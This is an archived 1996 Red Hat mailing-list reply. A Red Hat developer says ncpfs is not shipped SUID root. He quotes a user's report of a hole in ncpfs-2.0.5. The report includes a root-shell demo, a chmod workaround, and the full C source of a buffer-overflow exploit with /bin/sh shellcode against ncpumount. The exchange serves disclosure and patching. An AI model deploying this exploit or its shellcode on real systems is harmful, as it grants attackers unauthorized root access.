[457] in RedHat Linux List
Re: security hole in ncpfs-2.0.5-2 [really!]
daemon@ATHENA.MIT.EDU (Erik Troan)
Tue Oct 22 18:09:15 1996
Date: Tue, 22 Oct 1996 18:07:21 -0400 (EDT)
From: Erik Troan <ewt@redhat.com>
To: Alex Mottram <alex@mail.net-connect.net>
cc: redhat-list@redhat.com
In-Reply-To: <Pine.LNX.3.91.961022164741.19414C-100000@dns1.net-connect.net>
Resent-From: redhat-list@redhat.com
Reply-To: redhat-list@redhat.com
We don't ship ncpfs SUID root as it has race conditions in it that
are exploitable, so this problem does not affect Red Hat.
Erik
> ---------- Forwarded message ----------
> Date: Tue, 22 Oct 1996 16:45:35 -0500 (CDT)
> From: Alex Mottram <alex@net-connect.net>
> To: rehat-list@redhat.com
> Subject: security hole in ncpfs-2.0.5-2 [really!]
>
> It appears as though the ncpfs package shipped with RH4.0 suffers from the
> same security hole as mount did a few months back.
>
> This was brought up on the linux security mailing list a few days back.
> (I don't claim credit).
>
> [alex@machine /tmp]$ cc mount.c -o rootme
> [alex@machine /tmp]$ ./rootme
> Discovered and Coded by Bloodmask and Vio, Covin 1996
> bash#
>
> Temporary fix is it either uninstall ncpfs or chmod u-s /usr/bin/ncpmount
> and /usr/bin/ncpumount.
>
>
>
> --- mount.c ---
> /* Mount Exploit for Linux, Jul 30 1996
>
> ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
> ::::::::""`````""::::::""`````""::"```":::'"```'.g$$S$' `````````"":::::::::
> :::::'.g#S$$"$$S#n. .g#S$$"$$S#n. $$$S#s s#S$$$ $$$$S". $$$$$$"$$S#n.`::::::
> ::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ .g#S$$$ $$$$$$ $$$$$$ ::::::
> ::::: $$$$$$ gggggg $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::
> ::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::
> ::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::
> ::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::
> ::::::`S$$$$s$$$$S' `S$$$$s$$$$S' `S$$$$s$$$$S' $$$$$$$ $$$$$$ $$$$$$ ::::::
> :::::::...........:::...........:::...........::.......:......:.......::::::
> :::::::::::::::::::::::::::::::::::::::::::::::;::::::::::::::::::::::::::::
>
> Discovered and Coded by Bloodmask & Vio
> Covin Security 1996
> */
>
> #include <unistd.h>
> #include <stdio.h>
> #include <stdlib.h>
> #include <fcntl.h>
> #include <sys/stat.h>
>
> #define PATH_MOUNT "/bin/ncpumount"
> #define BUFFER_SIZE 1024
> #define DEFAULT_OFFSET 50
>
> u_long get_esp()
> {
> __asm__("movl %esp, %eax");
>
> }
>
> main(int argc, char **argv)
> {
> u_char execshell[] =
> "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
> "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
> "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
>
> char *buff = NULL;
> unsigned long *addr_ptr = NULL;
> char *ptr = NULL;
>
> int i;
> int ofs = DEFAULT_OFFSET;
>
> buff = malloc(4096);
> if(!buff)
> {
> printf("can't allocate memory\n");
> exit(0);
> }
> ptr = buff;
>
> /* fill start of buffer with nops */
>
> memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
> ptr += BUFFER_SIZE-strlen(execshell);
>
> /* stick asm code into the buffer */
>
> for(i=0;i < strlen(execshell);i++)
> *(ptr++) = execshell[i];
>
> addr_ptr = (long *)ptr;
> for(i=0;i < (8/4);i++)
> *(addr_ptr++) = get_esp() + ofs;
> ptr = (char *)addr_ptr;
> *ptr = 0;
>
> (void)alarm((u_int)0);
> printf("Discovered and Coded by Bloodmask and Vio, Covin 1996\n");
> execl(PATH_MOUNT, "mount", buff, NULL);
> }
>
>
>
>
-------------------------------------------------------------------------------
Always hoped that I'd be an apostle. Knew that I would make it if I tried.
Then when we retire we can write the gospels so they'll all talk about
us when we've die. - "The Last Supper" from Jesus Christ Superstar
| Erik Troan = http://sunsite.unc.edu/ewt/ = ewt@sunsite.unc.edu |
--
PLEASE read the Red Hat FAQ, Tips, HOWTO and the MAILING LIST ARCHIVES!
________________________________________________________________________
http://www.redhat.com/RedHat-FAQ http://www.redhat.com/RedHat-HOWTO
http://www.redhat.com/RedHat-Tips http://www.redhat.com/mailing-lists
------------------------------------------------------------------------
To unsubscribe: mail -s unsubscribe redhat-list-request@redhat.com < /dev/null
